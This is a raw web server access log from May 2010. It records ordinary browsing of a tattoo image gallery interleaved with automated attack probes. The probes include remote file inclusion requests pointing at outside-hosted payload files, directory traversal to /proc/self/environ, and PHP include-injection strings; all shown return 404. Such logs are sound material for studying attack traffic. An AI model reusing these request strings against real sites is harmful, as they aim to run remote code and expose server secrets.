88.191.94.188 - - [23/May/2010:07:24:41 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [23/May/2010:07:24:41 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:26:08 -0500] "GET //admin.joomlaflashfun.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:26:08 -0500] "GET /logs//admin.joomlaflashfun.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:26:08 -0500] "GET /logs/access_log.1271548800//admin.joomlaflashfun.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.36.5.247 - - [23/May/2010:07:27:03 -0500] "GET /logs/inurl:/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.831"
69.36.5.247 - - [23/May/2010:07:27:03 -0500] "GET /inurl:/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
198.161.91.4 - - [23/May/2010:07:27:14 -0500] "GET /logs/access_log.1266019200/index2.php?showpage=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:07:27:14 -0500] "GET /logs/access_log.1262822400/index2.php?showpage=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:07:27:14 -0500] "GET /logs/index2.php?showpage=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
198.161.91.4 - - [23/May/2010:07:27:14 -0500] "GET /index2.php?showpage=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:28:05 -0500] "GET /logs/access_log.1272240000//admin.joomlaflashfun.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.65.166.74 - - [23/May/2010:07:28:05 -0500] "GET /logs/access_log.1271462400//admin.joomlaflashfun.php?mosConfig_live_site=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.36.5.247 - - [23/May/2010:07:29:52 -0500] "GET /logs/inurl:/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 328 "-""libwww-perl/5.831"
69.36.5.247 - - [23/May/2010:07:29:52 -0500] "GET /inurl:/modules/agendax/addevent.inc.php?agendax_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
149.254.182.184 - - [23/May/2010:07:30:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:02 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:19 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:20 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:23 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:23 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:23 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:23 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:24 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:24 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:24 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:40 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:40 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:42 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:30:42 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
74.55.65.134 - - [23/May/2010:07:30:58 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:30:58 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
149.254.182.184 - - [23/May/2010:07:31:08 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:11 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:11 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:11 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:11 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:12 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:30 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:31 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:31 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:31 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:31 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:31 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:54 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:54 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:54 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
149.254.182.184 - - [23/May/2010:07:31:54 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
188.40.137.140 - - [23/May/2010:07:32:10 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:32:11 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:32:50 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:32:50 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
195.5.163.207 - - [23/May/2010:07:33:05 -0500] "GET ///moviefl/download.php?board_skin_path=http://163.20.166.223:8080///appserv/1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
195.5.163.207 - - [23/May/2010:07:33:05 -0500] "GET /logs///moviefl/download.php?board_skin_path=http://163.20.166.223:8080///appserv/1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
195.5.163.207 - - [23/May/2010:07:33:05 -0500] "GET /logs/access_log.1271721600///moviefl/download.php?board_skin_path=http://163.20.166.223:8080///appserv/1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:33:34 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:33:34 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:33:48 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.251.10.117 - - [23/May/2010:07:33:55 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [23/May/2010:07:33:56 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
200.61.185.200 - - [23/May/2010:07:34:36 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:34:37 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
200.61.185.200 - - [23/May/2010:07:34:43 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
74.55.65.134 - - [23/May/2010:07:35:45 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:35:46 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
188.40.137.140 - - [23/May/2010:07:36:14 -0500] "GET /logs/access_log.1273622400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:36:15 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:36:15 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:36:48 -0500] "GET /logs/access_log.1273622400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:36:48 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.40.137.140 - - [23/May/2010:07:36:49 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
74.55.65.134 - - [23/May/2010:07:37:01 -0500] "GET /logs/access_log.1273622400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:37:01 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:37:01 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
64.251.10.117 - - [23/May/2010:07:37:03 -0500] "GET /logs/access_log.1273622400//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.834"
64.251.10.117 - - [23/May/2010:07:37:03 -0500] "GET //*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
64.251.10.117 - - [23/May/2010:07:37:03 -0500] "GET /logs//*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
74.55.65.134 - - [23/May/2010:07:37:44 -0500] "GET /logs/access_log.1273622400//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:37:44 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [23/May/2010:07:37:44 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
200.61.185.200 - - [23/May/2010:07:38:08 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:29 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:30 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.133.201.194 - - [23/May/2010:07:40:30 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.covingtons.org/fx29id.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /logs/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.45.185.154 - - [23/May/2010:07:40:40 -0500] "GET /plugins/wp-table/js/wptable-button.phpp?wpPATH=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
